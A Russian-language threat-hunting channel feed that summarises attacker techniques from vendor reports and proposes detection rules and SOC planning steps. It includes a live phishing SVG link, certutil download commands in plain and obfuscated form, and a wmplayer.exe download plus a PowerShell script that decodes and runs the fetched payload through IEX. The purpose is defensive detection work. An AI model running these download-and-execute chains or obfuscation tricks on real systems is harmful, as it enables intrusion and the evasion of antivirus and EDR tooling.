Ранее обсуждали использование вредоносами 🦠 Tor и утилит для туннелирования, на Хабре рассказали про альтернативные оверлейные сети, их нужно обнаруживать и блокировать)

#ttp@detectioneasy

У Unit 42 был замечательный отчет 😎 Начало обещает что-то интересное

This activity cluster used rare tools and techniques including the technique we call Hex Staging, in which the attackers deliver payloads in chunks. Their activity also includes exfiltration over DNS using ping, and abusing the SQLcmdutility for data theft.

🔤 эксфильтрация вывода команд через утилиту ping. Домен, который пингуют формируется так, tasklist.exe.outputformatstring.dnslog.pw , на месте tasklist.exe может быть другое имя. Каждый новый домен будет резолвится на dns-серверах, которые под контролем злоумышленников dnslog.pw (не забудьте сделать ретро по свои логам)

🔤 использование invoke-webrequest и certutil

🔤 DLL sideloading, для обхода обнаружения дропается уязвимый легитимный Acrobat.exe и рядышком незаметная Acrobat.DLL которая расшифрует и запустит PlugX

🔤 Hex Staging, суть метода запись файла по кускам в hex, а не полностью, для обхода обнаружения. Далее кодировка меняется с помощью certutil

🔤 для обхода UAC использовали SspiUacBypass (почитать), BadPotato, RasmanPotato

🔤 в качестве C2, кроме Cobalt Strike, группировка использовала Supershell

#ttp@detectioneasy

Всем привет!) ⚠️

Отличные новости 😅 в инструментах SysInternals обнаружили уязвимости DLL Hijacking

Некоторые из уязвимых утилит Sysmon, Process Explorer, Autoruns, Bginfo и другие 🧑‍💻

Полный список 🤔

#ttp@detectioneasy

У MITRE есть фреймфорк ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) - это база знаний о тактиках, техниках и процедурах атакующих в отношении систем Al, основанная на реальных наблюдениях за атаками и реалистичными демонстрациями.

Матрица имеет следующие тактики:

🔤 Reconnaissance
🔤 Resource Development
🔤 Initial Access
🔤 ML Model Access
🔤 Execution
🔤 Persistence
🔤 Privilege Escalation
🔤 Defense Evasion
🔤 Credential Access
🔤 Discovery
🔤 Collection
🔤 ML Attack Staging
🔤 Exfiltration
🔤 Impact

#ttp@detectioneasy

Всем привет! 👋

Исчерпывающие руководство по способам закрепления в Linux, но отсутствуют актуальные техники, такие как udev

#ttp@detectioneasy

Знали ли Вы о применении svg в фишинговых кампаниях 🧑‍💻?)

Sophos поделились накопленной информацией о применении такой техники.
Пример вредоносного файла с MalwareBazaar 🦠 который предлагает кликнуть для продолжения авторизации

<svg height="30" width="200" xmlns="https://www.w3.org/2000/svg">
  <a href="https://subtettiarrydivisions.s3.us-west-2.amazonaws.com/dzfhoerszgfiuwkeadbfwuoeudjiwsl.html" target="_blank">
    <text x="5" y="15" fill="blue">Yzesati Click To Sign </text>
  </a>
</svg>

Использование html-тегов выглядит безобидно всравнении с возможностями внедрения JS, который используется для автоматического перехода на вредоносный ресурс, даже если пользователь не нажал на ссылку.

Злоумышленники позаботились о защите своих ресурсов от песочниц и прикрутили к ним CAPTCHA от CloudFlare)
Нужно ли добавлять в ТЗ к песочницам возможность решения капчи для анализа ссылок??🧐)

#ttp@detectioneasy

Всем привет 👋

В отчете про Kimsuky 🧑‍💻 интересно, что при отсутствии на взломанном хосте службы удаленных рабочих столов, атакующие используют rdpwrap

Что же делать?)) 🔭

🔤 Создание файла RDPWInst.exe, rdpwrap.ini, rdpwrap.txt, rdpwrap.dll

🔤 метаданные файла совпадают с Product: RDP Host Support или Company: Stas'M Corp.

🔤 изменение ключа реестра HKLM\System\CurrentControlSet\services\TermService\Parameters\ServiceDll\

Можем похантить, если значение этого ключа не System32\termsrv.dll, стоит подзадуматься

#ttp@detectioneasy

Большой обзор про использование cloudflared для туннелирования трафика 🧑‍💻

https://labs.jumpsec.com/bring-your-own-trusted-binary-byotb-bsides-edition/

#ttp&@detectioneasy

Как всегда супер отчет от thedfirreport

Почему-то все еще работают закрепы в автозагрузке и планировщике задач 🧑‍💻

#ttp@detectioneasy
#detection@detectioneasy

🔤🔤 Компания World of detection выбирает SIEM, и наткнулась на руководство от Elastic по выбору SIEM для современного SOC 🧃

Как и во всех документах по построению SOC сердцем являются - люди ✌️ но их эффективность зависит от применяемых решений

Какие функции должны быть у современного SIEM:
🔤 поддержка источников событий, применямых в Detection of the world
🔤 применение различных аналитических моделей (машинное обучение, поведенческий, статистический анализ)
🔤 автоматизация процессов триажа событий и проведения расследования
🔤 горизонтальное масштабирование производительности

В документе собрали чеклист из 25 пунктов по внедрению SIEM, в нем рассмотрены такие направления, как:
🔤 получение данных и их нормализация
🔤 обнаружение и предотвращение угроз
🔤 реагирование, проведение расследований и проактивный поиск угроз
🔤 архитектурные возможности

#detection@detectioneasy

Привет!) 👋

Все слышали про PsExec и многие с ним работали)
Он позволяет нам локально повысить привелегии до SYSTEM 😇 или другого пользователя, выполнять команды удаленно. Администраторы держат его под рукой, чтобы в случае нештатной ситуации быстро настроить сломавшийся хост)

Выглядит удобно, еще и подписан сертификатом Microsoft.

Получается идеальный инструмент для Lateral Movement 🧑‍💻 Хакеры и пентестеры часто используют PsExec или его аналоги psexec.py для продвижения по сети.

Что для красных удобно - для синих шумно 🤔

Уже не первый разбор в котором описана работа PsExec.

Вспомним основные этапы его работы:
🔤 загрузка двоичного файла в ADMIN$
🔤 удаленное создание службы
🔤 удаленный запуск службы
🔤 проверка, что служба запущена

В статье упоминали про утилиту psexecsvc.py. Основное отличие от других реализаций - использование подписанного файла для службы PsExecSvc, что может позволить обойти сигнатурное обнаружение

#ttp@detectioneasy
#detection@detectioneasy

Всем привет!) 👋
Пытались ли Вы скачать нагрузку с помощью certutil? Наверняка AV/EDR заблокировал Вашу попытку 🤚

Однако, если обфусцировать аргументы команд, попытка может стать успешной 👍

Для cmd/bat появился онлайн-ресурс https://argfuscator.net/, который обфусцирует аргументы. Правила обфускации определены в репозитории проекта

Интересно, сможем ли мы обнаружить, что запускалось на самом деле?)🔭

#ttp@detectioneasy

Специалисты ЛК поделились обзором по применению Mythic C2

Все как обычно, атакующие присылают письмо с архивом ✉️ внутри которого архив, внутри которого LNK, ps1 и много decoy-файлов) Да-да вот такие матрешки собираются 🪆

Дальше происходит выполнение ряда скриптов)

Интерес для TH может представлять использование conhost.exe в качестве родительского процесса

conhost --headless C:\Users\Public\Libraries\Passport\19.jpg

Можно познакомиться с Sigma-правилом

#ttp@detectioneasy
#detection@detectioneasy

Всем привет!)
В конце 2024 года, один из исследователей обнаружил возможность загружать файлы на хост с помощью Windows Medial Player - wmplayer.exe

Для запуска нужно выполнить

& "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "https://pampuna.nl/example/whoami.wma"

файл сохраняется в INetCache, для его поиска и запуска скрипт от автора ниже)

Get-ChildItem -Recurse -Force -ErrorAction SilentlyContinue -filter "whoami*.dat" "~\AppData\Local" | ForEach-Object {
    Write-Host "Found: $($_.FullName)"
    cd $_.DirectoryName 
    $data = [System.IO.File]::ReadAllBytes($_.FullName)
    $base64 = ([System.Text.Encoding]::UTF8.GetString($data) -replace '\b\w{1,5}\b', '') -replace '[^A-Za-z0-9+/=]', ''
    Write-Host $base64
    $converted = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($base64))
    IEX($converted)
}

Попробуем обнаружить?) 🔭

#ttp@detectioneasy
#detection@detectioneasy

Продолжим тему с обфускацией аргументов и команд в Windows

Есть два примера из событий запуска процессов, первый не обфусцированный:

certutil.exe -urlcache -split -f https://www.example.org/file.exe file.exe

и второй обфусцированный:

CeRtutIL.EXe -uʳLᶜᵃ?ᶜH?E? /ˢᵖˡ??It??ԫ -"F" htt"ps:/"/www.e"xa"m"p"le.o"r"g"/fi"le.e"xe" fi"L"E.exe

Если мы второй пример приведем к lowercase, то это нам особо не поможет, т.к. мы можем зафиксировать только факт использования бинаря)

Но кто в здоровой инфраструктуре будет использовать, такое количество непонятных символов, вставлять кавычки по середине слов? 🧑‍💻

Мы можем построить обнаружение на проверке регулярным выражением использования кавычек:

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 1 and CommandLine = "[\w\d\/\:]+\"+[\w\d\/\:]+"

В нормальной ситуации кавычки используются в начале и конце строки, наример certutil "https://qwer.qwer", а при обфускации кавычки вставляются в аргументы и их значения, для деления слова на неосмысленные группы

#ttp@detectioneasy
#detection@detectioneasy

Всем привет! 👋

TrendMicro поделились TTP группировки Void Banshee 👨‍💻.

В качестве первоначального доступа хакеры используют CVE-2024-38112. Злоумышленники используют URL-файлы и схему протокола MHTML, для открытия сайтов в Internet Explorer.

IE не обладает всеми функциями защиты от фишинга, как Edge или другие актуальные браузеры. При открытии сайта начинается загрузка hta-файла и пользователю предлагается варианты сразу запустить его или сохранить.

Для заблуждения пользователя, перед расширением вставляют юникод символы E2 A0 80 из шрифта Брайля, чтобы не было видно второго расширения файла - HTA.

Использование пробелов в названии файлов часто используется хакерами, для отвлечения внимания жертвы.

Можем обнаруживать такое поведение, проверкой наличия более двух пробелов в названии файлов 🔭

ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName = "\.[\w\d]+\s{2,}\.[\w\d]+"

POC

#ttp@detectioneasy
#detection@detectioneasy

🔤🔤 Этап 2 — Сортировка требований на разработку

Пока аналитики World of Detection разибирают накопившиеся таски. Руководство решило определить формулу расчета критичности задач.

Процесс может выглядеть следующим образом: источники требований (мы их определили раньше), создают задачу в таск трекере - критичность проставляется автоматически, по нашим критериям, или вручную, если скрипта (функционала) еще нет.

Для расчета мы можем использовать четыре критерия:

🔤 Серьезность угрозы
🔤 Влияние на нашу организацию
🔤 Охват правилами обнаружения
🔤 Активные эксплойты

🔤 Серьезность угрозы - оцениваем последствия атаки (эксплойта, уязвимости и т.п.), на которую создан таск

🔤 Влияние на нашу организацию - нужно понимать, относится ли атака к нашей организации, если эксплойт для MacOS, а у нас все на Linux, то нет смысла дальше отрабатывать этот таск. Если география действий атакующих не совпадает с нами, или с нашей отраслью, то все равно стоит обратить внимание, но с низким приоритетом, такие отчеты интересны используемыми TTP.

🔤 Наличие готового правила обнаружения - было ли такое требование ранее? Может быть у нас уже есть правило обнаружения похожей деятельности, и его нужно доработать?

Два критерия ниже, можем использовать для требования на разработку обнаружения эксплуатации уязвимости.

🔤 Наличие уязвимости - уязвима ли наша организация, для эксплуатации ? Установлены ли патчи?

🔤 Наличие POC - есть ли упоминания об использовании эксплойтов или наличие общедоступного POC

Для расчета критичности вам нужно определить, строгую систему баллов, для каждого критерия, рассмотренного выше. Критичность будет равна сумме проставленных баллов.

Критичность = Серьезность угрозы + Влияние на нашу организацию + Наличие готового правила обнаружения + (Наличие уязвимости + Наличие POC)

Количественная оценка критичности, будет определять ее уровень, например:

1-3 - низкий
4-7 - средний
8-10 - высокий
10+ - критический

#detection@detectioneasy

@devopsina ➡️ @bashdays